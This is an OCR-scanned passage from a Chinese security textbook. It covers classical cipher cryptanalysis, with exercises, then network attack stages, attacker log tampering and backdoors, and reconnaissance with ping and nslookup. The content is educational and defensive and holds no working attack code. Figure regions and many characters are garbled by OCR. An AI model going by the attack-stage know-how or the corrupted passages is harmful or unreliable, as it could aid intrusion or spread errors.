可 以 简单 地 实验 每 个 密 钥 ( 穷 举 密 钥 ) ,直到 找到 合适 的 密 钥 为 止 ,特别 是 借助 计算 机 分 
析 手 段 , 效 率 将 有 很 大 的 提高 。 

例如 ,假设 密 文 是 “LIZH ZLVK WR UHSODFH OHWWHUV”, 并 且 估 计 是 由 明文 
通过 移 位 形成 的 密 文 ,只 是 不 知道 密 钥 ( 移 几 位 ) ,那么 这 个 时 候 可 以 依次 分 别 移动 1 位 、 
2 位 ……25 位 ,再 根据 常识 就 可 以 破解 出 原来 的 明文 。 操 作 步骤 与 结果 如 表 5-3 所 示 。 
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表 5-3 穷 举 分 析 操 作 步 又 与 结果 























分 析 操 作 分 析 结 果 

移动 1 位 KH YG YKUJ VQ TGRNCEG NGVVGTU 
移动 2 位 JG XF XJTI UP SFQMBDF MFUUFST 
移动 3 位 IF WE WISH TO REPLACE LETTERS 
移动 4 位 HE VD VHRG SN QDOKZBD KDSSDOR 
移动 25 位 MJ AI AMWL XS VITPEGI PIXXIVW 








从 表 5-3 中 显示 的 信息 并 根据 常识 不 难 分 析 ,移动 3 位 得 到 的 结果 是 最 令 人 满意 的 , 因 
此 基本 可 以 确定 , 密 钥 实 际 就 是 3。 

可 能 这 种 方法 看 起 来 很 条 ,实际 上 , 穷 举 分 析 非 常 适合 有 一 定 规律 变化 的 密码 分 析 。 如 
果 采 用 计算 机 技术 来 分 析 ,将 变 得 更 快 。 

2. 根据 字母 频率 分 析 

众所周知 ,英文 文字 是 以 字母 为 最 小 文字 单位 的 。 不 管 英文 单词 如 何 千 变 万 化 ,说 到 
底 , 还 是 这 些 字母 在 不 断 改 变 排列 顺序 而 已 。 因 此 ,如 果 能 够 将 明文 字母 一 个 个 改变 掉 , 其 
实 也 就 相当 于 改变 了 原来 的 词汇 和 语句 的 模样 ,进而 也 就 守住 了 秘密 。 从 这 个 意义 上 讲 ， 
“一 对 一 ”的 模式 获得 了 最 大 的 成 功 ,被 普遍 地 应 用 在 各 种 加 密 场 合 。 类 似 地 ,密码 分 析 人 员 
可 以 整理 出 各 种 语言 ( 指 拼音 化 文字 ) 中 的 字母 出 现 频率 。 通 过 图 5-68 不 难看 出 ,什么 字母 
出 现 概率 最 大 ? 毫 无 疑问 就 是 e。 事 实 上 ,英文 字母 出 现 的 频率 从 高 到 低 的 顺序 是 
etaoinsrhldcumfpgwybvkxjqz。 不 仅 在 英语 和 德语 中 ,在 诸如 法 语 、 瑞 典 语 、 拉 丁 语 、 丹 麦 语 
等 许多 语言 中 ,字母 e 都 是 出 现 频率 最 高 的 。 当 密码 分 析 人 员 搜 集 到 足够 多 的 原始 密 文 资 
料 后 ,通过 分 析 会 发 现 , 不 管 对 手 怎么 替换 ,出 现 频 率 最 高 的 这 个 字母 只 能 是 e。。 因 此 ,只 要 
找到 密 文中 出 现 频率 最 高 的 字母 ,就 可 以 把 它 还 原 成 明文 的 e。 按 这 个 思路 ,通过 分 别 辨认 
和 标定 其 他 字母 ,再 做 一 些小 的 微调 和 语言 学 上 的 猜测 ,完全 可 以 将 密 文 一 点 点 地 还 原 成 
明文 。 


14.00% 
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"abcdefghijklmnopqrstuvw xyrz 


图 5-68 英文 字母 频率 分 布 图 
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这 种 分 析 方 法 利用 了 语言 学 的 知识 ,从 这 个 角度 看 ,对 人 类 行为 和 社会 的 研究 ,包括 语 


言 和 习惯 ,实际 上 也 在 密码 分 析 上 有 很 重要 的 作用 。 


的 一 


随 着 计算 机 加 密 技术 的 发 展 .如 何 利用 计算 机 与 数学 知识 来 分 析 密 码 是 当今 密码 破解 
个 重点 方向 。 考 虑 到 计算 机 密码 技术 普遍 采用 数学 难题 来 实现 ,因此 ,计算 机 密码 的 分 


析 主 要 是 依靠 对 数学 的 不 断 研 究 。 


为 ( 


习 题 


一 、 选 择 题 
1. 利用 恺 撤 加 密 算法 对 字符 串 ATTACK 进行 加 密 , 如 果 密 钥 为 3, 那么 生成 的 密 文 
) 。 


A. DWWDFN B. EXXEGO C. CVVCEM D. DXXDEM 
2. 下 面 ( ) 不 属于 对 称 加 密 算法 。 
A. DES B. IDEA C. RC5 D. RSA 


3. 下 面 ( ””) 不 是 RSA 密码 体制 的 特点 。 

A. 它 的 安全 性 基于 大 整数 因子 分 解 问题 

B. 它 是 一 种 公 钥 密码 体制 

C. 它 的 加 密 速度 比 DES 快 

D. 它 常 用 于 数字 签名 、 认 证 

在 公 钥 密码 体制 中 ,下 面 ( ) 是 不 可 以 公开 的 。 


A. 公 钥 B. 公 钥 和 加 密 算法 
C. 私 钥 D. 私 钥 和 加 密 算法 
5. 以 下 关于 公 钥 密码 体制 的 描述 中 ,错误 的 是 (。”)。 
A. 加 密 和 人 解密 使 用 不 同 的 密 钥 B. 公 钥 不 需要 保密 
C. 一 定 比 常规 加 密 更 安全 D. 常用 于 数字 签名 、 认 证 等 方面 


6. 用 户 A 通过 计算 机 网 络 给 用 户 B 发 送 消息 , 称 其 同意 签订 协议 。 随 后 ,A 又 表示 反 


悔 ,不 承认 发 过 该 消息 。 为 了 避免 这 种 情况 的 发 生 , 应 在 网 络 通信 中 采用 (  ”)。 


A. 防火 墙 技术 B. 消息 认证 技术 ”C. 数据 加 密 技术 D. 数字 签名 技术 
7. 下 列 选 项 中 ,防范 网 络 监听 最 有 效 的 方法 是 (  )。 

A. 安装 防火 墙 B. 采用 无 线 网 络 传输 

C. 数据 加 密 D. 漏洞 扫描 
8. 甲 方 和 乙方 采用 公 钥 密码 体制 对 数据 文件 进行 加 密 传 送 , 甲 方 用 乙方 的 公 钥 加 密 数 


据 文件 ,乙方 使 用 ( ) 对 数据 文件 进行 解密 。 


180 


A. 甲 的 公 钥 B. 甲 的 私 钥 C. 乙 的 公 钥 D. 乙 的 私 钥 
9.( ”) 可 以 在 网 上 对 电子 文档 提供 发 布 时 间 的 保护 。 

A. 数字 签名 B. 数字 证 书 C. 数字 时 间 截 D. 消息 摘要 
10.( ”) 不 是 数字 证 书 的 内 容 。 

A. 公开 密 钥 B. 数字 签名 


项 目 5 密码 技术 





C. 证 书 发 行 机 构 的 名 称 D. 私有 密 钥 


11. 以 下 关于 数字 签名 的 说 法 中 错误 的 是 (  )。 


A. 能 够 检测 报 文 在 传输 过 程 中 是 否 被 算 改 

B. 能 够 对 报 文 发 送 者 的 身份 进行 认证 

C. 能 够 检测 报 文 在 传输 过 程 中 是 否 加 密 

D. 能 够 检测 网 络 中 的 某 一 用 户 是 否 冒 充 另 一 用 户 发 送 报 文 


12. 下 面 ( ) 是 对 信息 完整 性 的 正确 阐述 。 


A. 信息 不 被 自 改 ,假冒 和 伪造 

B. 信息 内 容 不 被 指定 以 外 的 人 所 获悉 
C. 信息 在 传递 过 程 中 不 被 中 转 

D. 信息 不 被 他 人 所 接收 


13. 非 对 称 密码 体制 中 ,加密 过 程 和 解密 过 程 共 使 用 ( ) 个 密 钥 。 


A. 1 B. 2 C. 3 D. 4 


14. 在 安装 软件 时 ,常会 看 到 弹出 一 个 说 明 该 软件 开发 机 构 的 对 话 框 ,并 表明 你 的 系统 
不 信任 这 个 开发 机 构 , 这 是 采用 (  ) 实 现 的 。 


A. 数字 签名 B. 数字 证 书 C. 数字 时 间 戳 D. 消息 摘要 


15. 消息 摘要 可 用 于 验证 通过 网 络 传输 收 到 的 消息 是 否 是 原始 的 、 未 被 自 改 的 消息 原 
文 。 产 生 消 息 摘要 可 采用 的 算法 是 ( ys 











A. 哈 希 B. DES C. PIN D. RSA 

二 、 填空 题 

1. DES 算法 的 分 组 长 度 为 位 , 密 钥 长 度 为 位 ,需要 进行 轮 
迭代 的 乘积 变换 。 

2. 3DES 算法 的 分 组 长 度 为 位 , 密 钥 长 度 为 位 。 

3. IDEA 算法 的 分 组 长 度 为 位 , 密 钥 长 度 为 位 。 

4. AES 算 法 的 分 组 长 度 为 位 , 密 钥 长 度 为 位 。 

5. 常用 非 对 称 密码 技术 有 m 等 。 

6. MD5 算法 产生 的 消息 摘要 有 位 ,SHA/SHA-1 算法 产生 的 消息 摘要 
有 位 。 

7. Diffie-Hellman 算法 仅 限于 的 用 途 , 而 不 能 用 于 或 6 

8. 对 称 加 密 机 制 的 安全 性 取决 于 的 保密 性 。 

三 、 简 答题 

1. 经 典 密码 技术 包括 哪些 ?它们 主要 采用 哪 两 种 基本 方法 ? 

2. 简 述 对 称 密码 技术 和 非 对 称 密码 技术 的 基本 原理 和 区 别 。 

3. 单 向 散 列 算法 有 何 作用 ? 它 的 特点 是 什么 ? 

4. 简 述 数字 签名 的 基本 原理 和 作用 。 

5. 第 一 次 使 用 EFS 加 密 后 为 什么 应 及 时 备份 密 钥 ? 


四 、 弗 吉 尼 亚 密码 
GSKXWK YC US OXQZ KLSG YC JEQ PJZC 
以 上 是 弗吉尼亚 密 文 ( 密 钥 为 FOREST) ,请 把 它 解密 为 明文 : 
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五 、 安 全 电子 邮件 
某 公 司 的 业务 员 甲 与 客户 乙 通过 Internet 交换 商业 电子 邮件 。 


为 了 保障 邮件 内 容 的 安 


全 ,采用 安全 电子 邮件 技术 对 邮件 内 容 进行 加 密 和 数字 签名 。 安 全 电子 邮件 技术 的 实现 原 


理 如 图 5-69 所 示 。 
乙 的 公 钥 乙 的 私 钥 


| 


加 密 “ |-~L_ 上 -| 解密 











































































































明文 明文 
| gJ39vza | 
加 密 邮件 上 -= mp4n 解密 邮件 “上 一 一 邮件 
发 送 方 甲 【~ 接收 方 乙 
密 文 
朱 消息 摘要 
® 加 密 摘要 -| 签名 ~[ 解密 摘要 | 一 | ”Si 
| | 验证 签名 
(3) (4) 
图 5-69 安全 电子 邮件 技术 
1. 为 图 5-69 中 (1) 一 (4) 选 择 合适 的 答案 。 
(1) 一 (4) 的 备 选 答案 如 下 。 
A. DES 算法 B. MD5 算法 C. 会 话 密 钥 D. 数字 证 字 
E. 甲 的 公 钥 F. 甲 的 私 钥 G. 乙 的 公 钥 H. 乙 的 私 钥 
2. 以 下 关于 报 文摘 要 的 说 法 中 正确 的 有 (5)  、 (6) 
(5) 和 (6) 的 备 选 答案 如 下 。 
A. 不 同 的 邮件 很 可 能 生成 相同 的 摘要 
B. 由 邮件 计算 出 其 摘要 的 时 间 非 常 短 
C. 由 邮件 计算 出 其 摘要 的 时 间 非 常 长 
D. 摘要 的 长 度 比 输入 邮件 的 长 度 长 
E. 不 同 输入 邮件 计算 出 的 摘要 长 度 相 同 
F. 仅 根据 摘要 很 容易 还 原 出 原 邮 件 
3. 甲 使 用 Outlook Express 撰写 发 送 给 乙 的 邮件 ,他 应 该 使 用 (7) ”的 数字 证 书 来 
添加 数字 签名 ,而 使 用 (8) ”的 数字 证 书 来 对 邮件 加 密 。 
(7) 和 (8) 的 备 选 答案 如 下 。 
A. 甲 庆 多 GG 第 三 塘 D. CA 认证 中 心 
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【项 目 目标 】 


(1) 了 解 网 络 攻击 的 步骤 和 防范 策略 。 

(2) 掌握 目标 系统 的 探测 方法 。 

(3) 了 解 网 络 监听 原理 和 防范 方法 。 

(4) 掌握 口令 破解 原理 和 防范 方法 。 

(5) 掌握 IPC$ 入 侵 原 理 和 防范 方法 。 

(6) 了 解 缓冲 区 溢出 原理 和 防范 方法 。 

(7) 了 解 拒绝 服务 、 分 布 式 拒绝 服务 和 分 布 式 反 射 型 拒绝 服务 的 攻击 原理 和 防范 方法 。 
(8) 了 解 网 络 诱骗 技术 。 


61 项 目 提 出 


最 近 多 位 公司 员工 发 现 自己 计算 机 中 的 内 容 突然 丢失 或 被 算 改 ,有 的 计算 机 还 出 现 葛 
名 其 妙 的 重新 启动 现象 。 网 络 管理 员 小 李 接 到 报告 后 ,迅速 赶 到 现场 查看 ,发 现 这 几 台 计算 
机 的 硬盘 均 被 不 同 程度 地 设置 为 共享 了 ,有 的 计算 机 中 被 植 人 了 木马 ,有 的 计算 机 中 正在 运 
行 的 进程 和 服务 被 突然 终止 ,更 有 甚 者 ,有 的 计算 机 的 鼠标 指针 竟然 会 自行 移动 ,并 执行 了 
某 些 操作 。 而 查看 这 些 计 算 机 的 日 志 却 没有 任何 发 现 。 这 是 为 什么 呢 ? 


62 项 目 分 析 


从 这 几 台 计算 机 的 现象 来 看 ,非常 明显 ,它们 是 被 黑客 攻击 了 。 小 李 进 一 步调 查 发 现 这 
几 台 出 现 问题 的 计算 机 存在 着 一 些 共同 点 : 有 的 员工 为 了 自己 使 用 方便 或 其 他 一 些 原因 ， 
将 自己 计算 机 的 用 户 名 和 密码 (口令 ) 记 录 在 了 桌子 旁边 的 本 子 上 ,有 的 员工 设置 的 用 户 名 
和 密码 非常 简单 ,甚至 根本 没有 设置 密码 ; 几 台 计算 机 的 操作 系统 均 为 Windows 7 而 且 均 
默认 打开 了 IPC $ 共享 和 默认 共享 ;有 的 计算 机 未 安装 任何 杀毒 软件 或 未 开启 防火 墙 , 有 的 
安装 了 杀毒 软件 但 很 久未 作 升 级 ,有 的 计算 机 的 本 地 安全 策略 的 安全 选项 中 ,网 络 访问 : 
本 地 账户 的 共享 和 安全 模式 ”的 安全 设置 为 “经 典 一 一 对 本 地 用 户 进行 身份 验证 ,不 改变 其 
本 来 身份 ”。 
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由 于 公司 员工 所 在 的 办 公 室 的 人 员 进 出 较 多 ,有 可 能 他 们 的 用 户 名 和 密码 被 他 人 获知 。 
机 器 中 未 安装 杀毒 软件 和 未 开启 防火 墙 ,可 能 导致 他 人 利用 黑客 工具 可 以 非常 轻松 地 侵入 
这 些 计 算 机 ,然后 设置 硬盘 共享 .控制 计算 机 的 服务 和 进程 等 。 另 外 安全 选项 中 的 “网 络 访 
问 : 本 地 账户 的 共享 和 安全 模式 ”一 项 的 默认 设置 应 为 * 仅 来 宾 一 一 对 本 地 用 户 进行 身份 验 
证 ,其 身份 为 来 宾 ”, 这 样 的 设置 可 以 使 本 地 账户 的 网 络 登 录 将 自动 映射 到 Guest 账户 , 否 
则 ,只 要 获知 本 地 用 户 的 密码 ,就 有 可 能 侵入 用 户 的 计算 机 并 访问 和 共享 系统 资源 了 。 

黑客 攻击 的 手段 和 方法 有 很 多 ,黑客 攻击 的 大 致 过 程 可 能 如 下 : 首先 黑客 获得 目标 主 
机 的 用 户 名 和 密码 ,可 能 在 员工 办 公 室 中 直接 获得 密码 ,也 可 能 利用 黑客 工具 攻击 目标 主机 
并 获得 其 中 弱 口 令 主机 的 用 户 名 和 密码 ;然后 利用 黑客 攻击 软件 对 这 些 目 标 主机 进行 攻击 ， 
完成 设置 硬盘 共享 .控制 服务 和 进程 安装 木马 等 操作 ;最 后 清除 目标 主机 的 日 志 内 容 , 消 除 
入 侵 痕迹 。 另 外 ,黑客 还 有 可 能 对 某 些 目标 主机 进行 了 监视 甚至 控制 。 

只 要 给 计算 机 及 时 打上 安全 补丁 ,设置 强 口令 ,安装 最 新 的 杀毒 软件 和 防火 墙 ,就 可 以 
防范 大 部 分 的 黑客 攻击 。 











63 相关 知识 点 


6.3.1 网 络 攻防 概述 


1. 黑客 概述 

1) 黑客 的 由 来 

黑客 是 Hacker 的 音译 , 源 于 动词 Hack, 在 美国 麻 省 理工 学 院 校园 但 语 中 是 “恶作剧 ” 
的 意思 ,尤其 是 那些 技术 高 明 的 恶作剧 ,确实 ,早期 的 计算 机 黑客 个 个 都 是 编程 高 手 。 因 此 ， 
“黑客 "是 人 们 对 那些 编程 高 手 、 迷 恋 计 算 机 代码 的 程序 设计 人 员 的 称谓 。 真 正 的 黑客 有 自 
己 独特 的 文化 和 精神 ,并 不 破坏 其 他 人 的 系统 ,他 们 崇拜 技术 ,对 计算 机 系统 的 最 大 潜力 进 
行 智力 上 的 自由 探索 。 

美国 (发 现 ) 杂 志 对 黑客 有 以 下 5 种 定义 。 

(1) 研究 计算 机 程序 并 以 此 增长 自身 技巧 的 人 。 

(2) 对 编程 有 无 穷 兴 趣 和 热忱 的 人 。 

(3) 能 快速 编程 的 人 。 

(4) 某 专门 系统 的 专家 ,如 “UNIX 系统 黑客 ”。 

(5) 恶意 间 入 他 人 计算 机 或 系统 ,意图 盗 取 敏感 信息 的 人 。 对 于 这 类 人 最 合适 的 用 词 
是 Cracker( 黑 客 ) ,而 非 Hacker。 两 者 最 主要 的 不 同 是 , Hacker 创造 新 东西 ,Cracker 破坏 
东西 。 

2) 黑客 攻击 的 动机 

随 着 时 间 的 变化 ,黑客 攻击 的 动机 不 再 像 以 前 那样 简单 了 : 只 是 对 编程 感 兴趣 ,或 是 为 
了 发 现 系 统 漏洞 。 现 在 .黑客 攻击 的 动机 越 来 越 多 样 化 ,主要 有 以 下 几 种 。 

(1) 贪心 。 因 为 贪心 而 偷窃 或 者 硕 诈 ,有 了 这 种 动机 , 才 引 发 许多 金融 案件 。 

(2) 恶作剧 。 计 算 机 程序 员 搞 的 一 些 恶 作 剧 ,是 黑客 的 老 传统 。 
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(3) 名 声 。 有 些 人 为 显露 其 计算 机 经 验 与 才智 ,以 便 证 明 自 己 的 能 力 ,获得 名 气 。 

(4) 报复 / 宿 息 。 解 雇 、 受 批评 或 者 被 降级 的 雇员 ,或 者 其 他 认为 自己 受到 不 公正 待遇 
的 人 ,为 了 报复 而 进行 攻击 。 

(5) 无 知 /好 奇 。 有 些 人 拿 到 了 一 些 攻击 工具 ,因为 好 奇 而 使 用 ,以 至 于 破坏 了 信息 还 
不 知道 。 

(6) 仇恨 。 国 家 和 民族 原因 。 

(7) 间谍 。 政 治 和 军事 谍报 工作 。 

(8) 商业 。 商 业 竞争 ,商业 间谍 。 

黑客 技术 是 网 络 安全 技术 的 一 部 分 ,主要 是 看 用 这 些 技术 做 什么 ,用 来 破坏 其 他 人 的 系 
统 就 是 黑客 技术 ,用 于 安全 维护 就 是 网 络 安全 技术 。 学 习 这 些 技术 就 是 要 对 网 络 安全 有 更 
深 的 理解 ,从 更 深 的 层次 提高 网 络 安全 。 

2. 网 络 攻 击 的 步骤 

进行 网 络 攻击 并 不 是 件 简单 的 事情 , 它 是 一 项 复杂 及 步骤 性 很 强 的 工作 。 一 般 的 攻击 
都 分 为 3 个 阶段 , 即 攻 击 的 准备 阶段 、 攻 击 的 实施 阶段 .攻击 的 善后 阶段 ,如 图 6-1 所 示 。 





















































| | 1 1 1 
| 1 | 利 1 ! | 消 | 
国生 本 本国 
| 型 |] 售 | | 碍 | | 要 | 帮 村 古 | 
1 | 定 | | 自 | 手 | | 到 | 1 | 1 
| | 玉 |- | 史 | 攻 | 1! | 目 | | 自生 | .| 植 | 
| | 者 [| 自 站 | 击 由 一 站 | 吕 站 | 个 让 各 站 | 入 | 
| | 晶 | | 集 | | 页 | 1 ;| 位 | | 号 | | 得 |! ;| 角 | | 
| | | | 至 | | 标 | | 独 | 1 1 ， | 
| at 主 | | 权 | 1 1 退 | 
| 1 1 机 1 1 昌 | 
| 1 1 

| 攻击 的 准备 阶段 | 1 攻击 的 实施 阶段 | |! 攻击 的 善后 阶段 | 


图 6-1 网 络 攻击 的 3 个 阶段 


1) 攻击 的 准备 阶段 

在 攻击 的 准备 阶段 重点 做 3 件 事 情 : 确定 攻击 目的 ,收集 目标 信息 以 及 准备 攻击 工具 。 

(1) 确定 攻击 目的 : 首先 确定 攻击 希望 达到 的 效果 ,这 样 才能 做 下 一 步 的 工作 。 

(2) 收集 目标 信息 : 在 获取 了 目标 主机 及 其 所 在 网 络 的 类 型 后 ,还 需 进 一 步 获 取 有 关 
信息 ,如 目标 主机 的 IP 地 址 .操作 系统 的 类 型 和 版 本 、 系 统管 理 人 员 的 邮件 地 址 等 ,根据 这 
些 信 息 进行 分 析 , 可 以 得 到 被 攻击 系统 中 可 能 存在 的 漏洞 。 

(3) 准备 攻击 工具 : 收集 或 编写 适当 的 工具 ,并 在 操作 系统 分 析 的 基础 上 ,对 工具 进行 
评估 ,判断 有 哪些 漏洞 和 区 域 没 有 覆盖 到 。 

2) 攻击 的 实施 阶段 

本 阶段 实施 具体 的 攻击 行动 。 作 为 破坏 性 攻击 ,只 需要 利用 工具 发 起 攻击 即 可 ;而 作为 
人 侵 性 攻击 ,往往 需要 利用 收集 到 的 信息 ,找到 系统 漏洞 .然后 利用 该 漏洞 获取 一 定 的 权限 。 
大 多 数 攻 击 成 功 的 范例 都 是 利用 被 攻击 者 系统 本 身 的 漏洞 。 能 够 被 攻击 者 利用 的 漏洞 不 仅 
包括 系统 软件 设计 上 的 漏洞 ,也 包括 由 于 管理 配置 不 当 而 造成 的 漏洞 。 

攻击 实施 阶段 的 一 般 步骤 如 下 。 
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(1) 隐藏 自己 的 位 置 。 攻 击 者 利用 隐藏 IP 地 址 等 方式 保护 自己 不 被 追踪 。 

(2) 利用 收集 到 的 信息 获取 账号 和 密码 ,登录 主机 。 攻 击 者 要 想 入 侵 一 台 主 机 ,仅仅 知 
道 它 的 IP 地 址 操作 系统 信息 是 不 够 的 .还 必须 要 有 该 主机 的 一 个 账号 和 密码 ,否则 连 登 录 
都 无 法 进行 。 他 们 先 设法 盗 取 账户 文件 ,进行 破解 或 进行 弱 口令 猜测 ,获取 某 用 户 的 账户 和 
密码 ,再 寻找 合适 时 机 以 此 身份 进入 主机 。 

(3) 利用 漏洞 或 者 其 他 方法 获得 控制 权 并 窃取 网 络 资源 和 特权 。 攻 击 者 用 FTP、 
Telnet 等 工具 且 利用 系统 漏洞 进入 目标 主机 系统 获得 控制 权 后 ,就 可 以 做 任何 他 们 想 做 的 
事情 了 。 例 如 ,下 载 敏 感 信息 ;窃取 账户 密码 信用卡 号码; 使 网 络 瘫痪 ,等 等 。 也 可 以 更 改 
某 些 系统 设置 ,在 系统 中 放置 特洛伊 木马 或 其 他 远程 控制 程序 ,以 便 日 后 可 以 不 被 察觉 地 再 
次 进入 系统 。 

3) 攻击 的 善后 阶段 

对 于 攻击 者 来 说 ,完成 前 两 个 阶段 的 工作 ,也 就 基本 完成 了 攻击 的 目的 ,所 以 ,攻击 的 善 
后 阶段 往往 会 被 忽视 。 如 果 完 成 攻击 后 不 做 任何 善后 工作 ,那么 他 的 行踪 会 很 快 被 细心 的 
系统 管理 员 发 现 ,因为 所 有 的 网 络 操作 系统 一 般 都 提供 日 志 记录 功能 ,记录 所 执行 的 操作 。 

为 了 自身 的 隐蔽 性 ,高 水 平 的 攻击 者 会 抹 掉 在 日 志 中 留 下 的 痕迹 。 最 简单 的 方法 就 是 
删除 日 志 , 这 样 做 虽然 避免 了 自己 的 信息 被 系统 管理 员 追 踪 到 ,但 是 也 明确 无 误 地 告诉 了 对 
方 系统 被 人 侵 了 ,所 以 最 常见 的 方法 是 对 日 志文 件 中 有 关 自 己 的 那 一 部 分 进行 修改 。 

清除 完 日 志 后 ,需要 植 和 后门 程 序 , 因 为 一 旦 系统 被 攻破 ,攻击 者 希望 日 后 能 够 不 止 一 
次 地 进入 该 系统 。 为 了 下 次 攻击 的 方便 ,攻击 者 都 会 留 下 一 个 后 门 。 充 当 后 门 的 工具 种 类 
非常 多 ,如 传统 的 木马 程序 。 为 了 能 够 将 受害 主机 作为 跳板 去 攻击 其 他 目标 ,攻击 者 还 会 在 
其 上 安装 各 种 工具 ,包括 嗅 探 器 .扫描 器 .代理 软件 等 。 

3. 网 络 攻击 的 防范 策略 

在 对 网 络 攻击 进行 分 析 的 基础 上 ,应 当 认 真 制定 有 针对 性 的 防范 策略 。 明 确 安全 对 象 ， 
设置 强 有 力 的 安全 保障 体系 。 有 的 放 矢 , 在 网 络 中 层 层 设防 ,使 每 一 层 都 成 为 一 道 关卡 ,从 
而 让 攻击 者 无 辽 可 钻 。 还 必须 做 到 未 雨 绸 缪 ,预防 为 主 ,备份 重要 的 数据 ,并 时 刻 注意 系统 
的 运行 状况 。 以 下 是 针对 众多 令 人 担心 的 网 络 安全 问题 所 提出 的 几 点 建议 。 

1) 提高 安全 意识 

(1) 不 要 随意 打开 来 历 不 明 的 电子 邮件 及 文件 ,不 要 随便 运行 不 太 了 解 的 人 发 送 的 程 
序 , 比 如 “特洛伊 ”类 黑客 程序 就 是 通过 欺骗 接收 者 的 方式 运行 。 

(2) 尽量 避免 从 Internet 上 下 载 不 知名 的 软件 、 游 戏 程 序 。 即 使 从 知名 的 网 站 下 载 的 
软件 也 要 及 时 用 最 新 的 病毒 和 木马 查 杀 软 件 对 软件 和 系统 进行 扫描 。 

(3) 密码 设置 尽 可 能 使 用 字母 数字 混 排 方式 ,单纯 的 英文 或 者 数字 很 容易 穷 举 。 将 常 
用 的 密码 设置 得 不 一 样 ,防止 被 人 查 出 一 个 ,连带 知道 了 自己 的 重要 密码 。 重 要 密码 最 好 经 
常 更 换 。 

(4) 及 时 下 载 安 装 系统 补丁 程序 。 

(5) 不 要 随便 运行 黑客 程序 ,许多 这 类 程序 运行 时 会 发 出 用 户 的 个 人 信息 。 

(6) 定期 备份 重要 数据 。 

2) 使 用 防 病毒 和 防火 墙 软件 

防火 墙 是 一 个 用 以 阻止 网 络 中 的 黑客 访问 某 个 网 络 的 屏障 ,也 可 称 为 控制 进 / 出 两 个 方 
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向 通信 的 门槛 。 在 网 络 边界 上 通过 建立 起 来 的 相应 网 络 通信 监控 系统 来 隔离 内 部 和 外 部 网 
络 , 以 阻挡 外 部 网 络 的 侵入 。 将 防 病毒 工作 当成 日 常 例 行 工 作 , 及 时 更 新 防 病毒 软件 和 病 
毒 库 。 

3) 隐藏 自己 的 IP 地 址 

保护 自己 的 IP 地 址 是 很 重要 的 。 事 实 上 ,即便 用 户 的 机 器 上 安装 了 木马 程序 , 若 没有 
该 机 器 的 IP 地 址 ,攻击 者 也 是 没有 办 法 入 侵 的 ,而 保护 IP 地 址 的 最 好 方法 是 设置 代理 服务 
器 。 代 理 服务 器 能 起 到 外 部 网 络 申请 访问 内 部 网 络 的 转 接 作 用 ,其 功能 类 似 于 一 个 数据 转 
发 器 , 它 主要 控制 哪些 用 户 能 访问 哪些 服务 类 型 。 


6.3.2 目标 系统 的 探测 


1. 常用 的 DOS 命令 

1) ping 命令 

ping 命令 是 入 侵 者 常用 的 网 络 命令 ,该 命令 主要 用 于 测试 网 络 的 连通 性 。 例 如 ,使 用 
“ping 192. 168. 1. 1” 命 令 ,如 果 返 回 结果 是 “Reply from 192. 168. 1. 1:bytes 王 32 time 一 1ms 
TTL=128”, 目 标 主 机 有 响应 ,说 明 192. 168. 1. 1 这 台 主 机 是 活动 的 。 如 果 返 回 的 结果 是 
“Request timed out. ”, 则 目标 主机 不 是 活动 的 , 即 目标 主机 不 在 线 或 安装 有 防火 墙 ,这 样 的 
主机 是 不 容易 入 侵 的 。 不 同 的 操作 系统 对 于 ping 的 TTL 返回 值 是 不 同 的 ,如 表 6-1 所 示 。 


表 6-1 不 同 的 操作 系统 对 ping 的 TTL 返回 值 











操作 系统 ee 操作 系统 0 
UNIX 类 255 Windows 7(32bit) 128 
Windows 95/98 32 Windows 7(64bit) 64 
Windows 2000/2003/XP/2008 128 














因此 ,入 侵 者 可 以 根据 不 同 的 TTL 返回 值 来 推测 目标 主机 究竟 属于 何 种 操作 系统 。 
对 于 入 侵 者 的 这 种 信息 收集 手段 ,网 络 管理 员 可 以 通过 修改 注册 表 来 改变 默认 的 TTL 返 
回 值 。 

在 一 般 情 况 下 黑客 是 如 何 得 到 目标 主机 的 IP 地 址 和 目标 主机 的 地 理 位 置 的 呢 ? 他 们 
可 以 通过 以 下 方法 来 实现 。 

(1) 由 域名 得 到 网 站 IP 地 址 ,方法 如 下 。 

方法 一 : 用 ping 命令 试探 。 如 果 黑 客 想 知 道 百度 服务 器 的 IP 地 址 ,运行 “ping www. 
baidu. com” 命 令 即 可 ,如 图 6-2 所 示 。 从 图 6-2 可 见 ,www. baidu. com 对 应 的 IP 地 址 为 
119. 75. 218. 77。 

方法 二 : 用 nslookup 命令 试探 。 同 样 以 百度 服务 器 为 例 , 运 行 “nslookup www. baidu. 
com” 命 令 , 如 图 6-3 所 示 。 从 图 6-3 可 知 ,Addresses 后 面 列 出 的 就 是 www. baidu. com 所 
使 用 的 Web 服务 器 群 里 的 IP 地 址 。 

(2) 由 IP 地 址 查询 目标 主机 的 地 理 位 置 。 由 于 IP 地 址 的 分 配 是 全 球 统一 管理 的 , 因 
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此 黑客 可 以 通过 查询 有 关机 构 的 IP 地 址 数据 库 得 到 该 IP 地 址 所 对 应 的 地 理 位 置 ,由 于 IP 
管理 机 构 多 处 于 国外 ,而 且 分 布 比较 零散 ,这 里 介绍 一 个 能 查询 到 IP 数据 库 的 网 站 http:// 


www.ip.cn, 如 图 6-4 所 示 。 

















图 6-2 用 ping 命令 试探 

















图 6-3 用 nslookup 命令 试探 











【< 】 | 加 heerwmwipcn/ PDP- Box | 加 mm -1p sen | x DO 





加 


手机 、 电 话 号 码 娄 据 库 ”DNS IP 
| 119.75.218.77| IE 
您 查询 的 IP: 119.75.218.77 


所 在 地 理 位 置 : 


GeolP: Beijing, China 





Beijing Baidu Netcom Science and Technology Co 




















图 6-4 由 IP 地 址 查询 目标 主机 的 地 理 位 置 


188 


项 目 6 网 络 攻击 与 防范 





如 要 查询 119. 75. 218. 77( 百 度 的 IP 地址) 的 地 理 位 置 ,可 在 图 6-4 中 的 文本 框 中 输入 
该 地址 ,然后 单 击 “ 查 询 ” 按 钮 ,就 可 得 到 如 图 6-4 所 示 的 结果 。 

2) netstat 命令 

netstat 命令 有 助 于 了 解 网 络 的 整体 使 用 情况 。 它 可 以 显示 当前 正在 活动 的 网 络 连接 
的 详细 信息 ,如 采用 的 协议 类 型 .当前 主机 与 远 端 相连 主机 的 IP 地 址 以 及 它们 之 间 的 连接 

netstat 命令 的 主要 用 途 是 检测 本 地 系统 开放 的 端口 ,这 样 做 可 以 了 解 自己 的 系统 开放 
了 什么 服务 ,还 可 以 初步 推断 系统 是 否 存在 木马 ,因为 常见 的 网 络 服务 开放 的 默认 端口 轻易 
不 会 被 木马 占用 。 

3) nbtstat 命令 

